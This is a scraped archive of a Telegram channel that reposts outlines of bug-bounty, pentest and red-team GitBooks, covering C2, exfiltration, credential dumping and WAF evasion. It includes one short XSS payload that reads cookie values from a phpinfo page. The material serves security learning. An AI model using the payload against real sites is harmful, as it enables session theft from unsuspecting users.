Bug Bounty - GitBook
Kanalga Telegram’da o‘tish
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Ko'proq ko'rsatish7 451
Obunachilar
+524 soatlar
+107 kunlar
+17130 kunlar
Postlar arxiv
7 451
Repost from Bug Bounty - GitBook
𝗥𝗲𝗱 𝗧𝗲𝗮𝗺 & 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀
>RED TEAMING
•Cheat Sheet
•Active Directory 101
•Fuzzing and Web
•Initial Foothold
•Privilege Escalation (Privesc)
•Lateral Movement (Pivoting)
•Persistence
•Command and Control (C&C)
•Data Exfiltration
•CVE & Exploits / CTF
>MALWARE ANALYSIS
•Unpacking
•Basic tips
•Malware instrumentation with frida
>MOBILE
•Reverse iOS ipa
•Reverse Android APKs
•Basic tips
>IOT / REVERSE / FIRMWARE
•Basic tips
•Reverse IoT devices
Link 🔗:-
https://gitbook.seguranca-informatica.pt/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗥𝗲𝗱 𝗧𝗲𝗮𝗺 𝗡𝗼𝘁𝗲𝘀
>RED TEAM TECHNIQUES
~Initial Access
•T1190: Exploit Public-Facing Applications
•T1133: External Remote Services
•T1566: Phishing
•T1195: Supply Chain Compromise
•T1078: Valid Accounts
•T1199: Trusted Relationship
~Execution
•T1047:Windows Management Instrumentation
•T1204: User Execution
•T1569: Service Execution
•T1053: Scheduled Tasks/Job
•T1106: Native API
•T1559: Inter-Process Communication
•T1203: Exploitation for Client Execution
•T1059: Command and Scripting Interpreter
~Persistence
•T1574: Hijack Execution Flow
•T1133:External Remote Services
•T1546:Event Triggered Execution
•T1543:Create or Modify System Process
•T1136: Create Account
•T1554:Compromise Client Software Binary
•T1547:Boot or Logon AutoStart Execution
•T1197: BITS Jobs
•T1053: Scheduled Tasks/Job
•T1098: Account Manipulation..
>RED TEAM INFRASTRUCTURE
~Reconnaissance
•Passive
•Active
~Weaponization
•Macros
•HTA
•ZIP
•ISO
~Delivery
•Gophish
•EvilGinx
•PwnDrop
~Situational Awareness
•Covenant and C#
•Empire and PowerShell
~Credential Dumping
•Mimikatz
•Lsass Dumping
•SharpChromium
~Persistence
•Userland Persistence
•Elevated Persistence
~Defense Evasion
•Disable or Modify Tools
•Obfuscating Files
~Privilege Escalation
•PowerUp
•PrivescCheck
~Lateral Movement
•RDP
•PowerShell Remoting
Link 🔗:-
https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗢𝗳𝗳𝘀𝗲𝗰 𝗝𝗼𝘂𝗿𝗻𝗲𝘆 𝗡𝗼𝘁𝗲𝘀
>LEARNING RESOURCES
•Web App Pentesting
>RECONNAISANCE
•OSINT
•Vulnerability Scabbing
>RESOURCE DEVELOPMENT
•Password Crack Rig
•Malware
•C2 Infrastructure
•Phishing Infrastructure
>INITIAL ACCESS
•Phishing
•Password Spray
•Malicious Outlook Rules
>HOST TRIAGE
•Situational Awareness
>INTERNAL RECONNAISSANCE
•Enumeration
•Lateral Movement
•Misc.
>DEFENSE EVASION
•Dynamic Analysis
•Static Analysis
•General
•Windows Internals
•Execution
•.NET Post Exploitation
•Powershell
•AMSI
>PRIVILEGE ESCALATION
•Domain Privilege Escalation
•Local Priv Esc - Windows
•Local Priv Esc - Linux
>LATERAL MOVEMENT
•Tunnels & Port Forward
>PERSISTENCE
•Local Persistence
•Domain Persistence
>LINUX
•Enumeration
•Lateral Movement
•Misc.
•Exploitation Techniques
•Exploit Dev
>KALI LINUX FU
•Kali Fu
•File System
>SCANNING & ENUMERATION
•Redis
•Port Scan
•RPC
•Kerberos
•WinRM
•Telnet
•PBX
•RDP
•Finger
•VNC
•Mail Servers
•SSH
•SMB
•Content Management Systems
•FTP
•Web Server
•DNS
•LDAP
•Database Services
•IKE VPN Service
•SNMP
•Sniffing
>WEB APP VULNERABILITIES
•Directory Traversal
•Server-Side Template Injection
•HTTP Parameter Pollution
•Sensitive Data Exposure
•Broken Access Control
•Business Logic Testing
•Broken Authentication
•XXE
•File Inclusion
•SSRF
•Injection
•Insecure Deserialization
•Cross-Site-Scripting (XSS)
>API PENTESTING
•Resources
>PROGRAMMING
•Bash
>MAINTAINING ACCESS
•C2 - Command & Control
•Notes
>CLOUD SECURITY PENTEST
•Penetration Testing AWS Storage
•Pentesting Azure
•Pentesting Cloud Networks
>BLUE TEAM
•Home Lab
•Reverse Engineering
•Forensics
>REVERSE ENGINEERING
•Malware Analysis
•Buffer Overflow
•Learning Resources
>HOME LAB PROJECT
•Initial Configuration
•Active Directory
>EXFILTRATION
•Attack Vectors
>WIRELESS PENTESTING
•Radius
Link 🔗:-
https://notes.offsec-journey.com/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗢𝗳𝗳𝘀𝗲𝗰 𝗝𝗼𝘂𝗿𝗻𝗲𝘆 𝗡𝗼𝘁𝗲𝘀
>LEARNING RESOURCES
•Web App Pentesting
>RECONNAISANCE
•OSINT
•Vulnerability Scabbing
>RESOURCE DEVELOPMENT
•Password Crack Rig
•Malware
•C2 Infrastructure
•Phishing Infrastructure
>INITIAL ACCESS
•Phishing
•Password Spray
•Malicious Outlook Rules
>HOST TRIAGE
•Situational Awareness
>INTERNAL RECONNAISSANCE
•Enumeration
•Lateral Movement
•Misc.
>DEFENSE EVASION
•Dynamic Analysis
•Static Analysis
•General
•Windows Internals
•Execution
•.NET Post Exploitation
•Powershell
•AMSI
>PRIVILEGE ESCALATION
•Domain Privilege Escalation
•Local Priv Esc - Windows
•Local Priv Esc - Linux
>LATERAL MOVEMENT
•Tunnels & Port Forward
>PERSISTENCE
•Local Persistence
•Domain Persistence
>LINUX
•Enumeration
•Lateral Movement
•Misc.
•Exploitation Techniques
•Exploit Dev
>KALI LINUX FU
•Kali Fu
•File System
>SCANNING & ENUMERATION
•Redis
•Port Scan
•RPC
•Kerberos
•WinRM
•Telnet
•PBX
•RDP
•Finger
•VNC
•Mail Servers
•SSH
•SMB
•Content Management Systems
•FTP
•Web Server
•DNS
•LDAP
•Database Services
•IKE VPN Service
•SNMP
•Sniffing
>WEB APP VULNERABILITIES
•Directory Traversal
•Server-Side Template Injection
•HTTP Parameter Pollution
•Sensitive Data Exposure
•Broken Access Control
•Business Logic Testing
•Broken Authentication
•XXE
•File Inclusion
•SSRF
•Injection
•Insecure Deserialization
•Cross-Site-Scripting (XSS)
>API PENTESTING
•Resources
>PROGRAMMING
•Bash
>MAINTAINING ACCESS
•C2 - Command & Control
•Notes
>CLOUD SECURITY PENTEST
•Penetration Testing AWS Storage
•Pentesting Azure
•Pentesting Cloud Networks
>BLUE TEAM
•Home Lab
•Reverse Engineering
•Forensics
>REVERSE ENGINEERING
•Malware Analysis
•Buffer Overflow
•Learning Resources
>HOME LAB PROJECT
•Initial Configuration
•Active Directory
>EXFILTRATION
•Attack Vectors
>WIRELESS PENTESTING
•Radius
Link 🔗:-
https://notes.offsec-journey.com/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗣𝗲𝗻𝘁𝗲𝘀𝘁 𝗕𝗼𝗼𝗸 𝗯𝘆 𝗻𝟯𝘁_𝗵𝘂𝗻𝘁𝟯𝗿
>Cloud Pentesting
•AWS Security Testing
•Azure Pentesting
•GCP Pentesting
>Web Application Pentesting
•XSS <Cross Site Scripting>
•XSS Filter Evasion and WAF Bypassing Tactics
•SSRF <Server Side Request Forgery>
•Open Redirect Vulnerability
•Command Injection
•File Upload
•Rate Limit Bypass Techniques
•IDOR
•Web Cache Poisoning /Web Cache Deception
•CSRF <Cross Site Request Forgery>
•XPATH injection
•LDAP Injection
•JWT Vulnerabilities <Json Web Tokens>
•CORS - Misconfigurations & Bypass
•Reset/Forgotten Password Bypass
•CRLF (%0D%0A) Injection
•Clickjacking
•Hostile Domain/Subdomain takeover
•Server Side Inclusion/Edge Side Inclusion Injection
•HTTP Request Smuggling / HTTP Desync Attack
•SAML Attacks
•OAuth to Account takeover
•Cross-site WebSocket hijacking (CSWSH)
•Uncovering CloudFlare
•Email Header Injection
•Unicode Normalization vulnerability
•Registration Vulnerabilities
•Race Condition
Link 🔗:-
https://n3t-hunt3r.gitbook.io/pentest-book/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗪𝗵𝗼𝗔𝗺𝗜 𝗪𝗿𝗶𝘁𝗲𝘂𝗽
•Web Cache Poisoning
•Came looking for SSRF and found XSS
•Phishing Attack using Machine Learning model
•JWT Attacks
•OAuth - Mechanism and Attacks
•Upgrade plan from Free to Paid via Response Manipulation
•XSS IN SOQL Console
•Journey from Automated Discovery to Manual Exploitation
Link 🔗:-
https://ibraradi.gitbook.io/write-up/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗜𝗻𝗳𝗼𝘀𝗲𝗰 𝗕𝗹𝗼𝗴
•Web Application Findings
•Recon automation, tips and tricks
•Hack The Box Machines
•CTF Challenges
•Red Teaming Tips & Tricks
•Cloud Security
Link 🔗:-
https://eslam3kl.gitbook.io/blog/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿 𝗛𝗮𝗻𝗱𝗯𝗼𝗼𝗸
•Getting Started in InfoSec and Bug Bounties
•Presentations
•Checklists / Guides
•Useful Twitter Threads
•List of Vulnerabilities
•API Security
•Mobile Security
•Fuzzing / Wordlists
•BugBounty Short Write-ups
•Burp Suite Tips and Tricks
•HackerOne Reports
•Response Manipulation
•Client Vs Server Side Vulnerabilities
•AWS
•Chaining of Bugs
•Bug Bounty Automation
•Mindmaps
•Oneliner Collections
•Red Teaming
•Blue Teamining
•Recon One Liners
•Containers
•Wordpress
•Fuzzing / FuFF
•OWASP ZAP
•Bug List
•Setting up burp collaborator
•Admin Panel PwN
•Credential Stuffing / Dump / •HaveibeenPwned?
•Tools Required
•Nuclei Template
Link 🔗:-
gowthams.gitbook.io/bughunter-handbook
@GitBook_s
7 451
برای حمایت از کانال پست آخر رو تو گروه ها بفرستید
To support the channel, send the last post to groups.
7 451
x=new XMLHttpRequest();
x.open('GET','//host/phpinfo',0);
x.send();rx=/COOKIE'.*v">(.*?)</;
alert(x.responseText.match(rx)[1]);
#XSS
@GitBook_s
7 451
Guys, how are the gitbooks? Do you like them? If you have any comments about them, please write to me.
7 451
بچه ها گیت بوک ها چطورین، خوب هستن، خوشتون میاد، در این مورد اگه نظری دارید بنویسید برام
دلیل فورواردم اینه که بعضی ها اصلا اول کانال رو نگا نمیکنن
7 451
Repost from Bug Bounty - GitBook
📖
Pentest Book by n3t_hunt3r
XSS Filter Evasion and WAF Bypassing Tactics
Cloud Pentesting
Web App Pentesting
Link 🔗:-
https://n3t-hunt3r.gitbook.io/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
Pentest Book
Recon
Enumeration
Exploitation
Post Exploitation
Mobile
Others
Link 🔗:-
http://six2dez.gitbook.io
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
Breaking Bits
Vulnerability Discovery
CTF
Firmware Emulator
Exploit Development
Link 🔗:-
https://breaking-bits.gitbook.io/
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
Pentest Everything
🚩Writeups
Everything
Resources
Link 🔗:-
https://viperone.gitbook.io
@GitBook_s
7 451
Repost from Bug Bounty - GitBook
+ Application Security Cheat Sheet
Android Application
CI/CD
Cloud
Container
Framework
Linux
iOS Application
Resources
Web Application
Link 🔗:-
https://0xn3va.gitbook.io/cheat-sheets
@GitBook_s
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
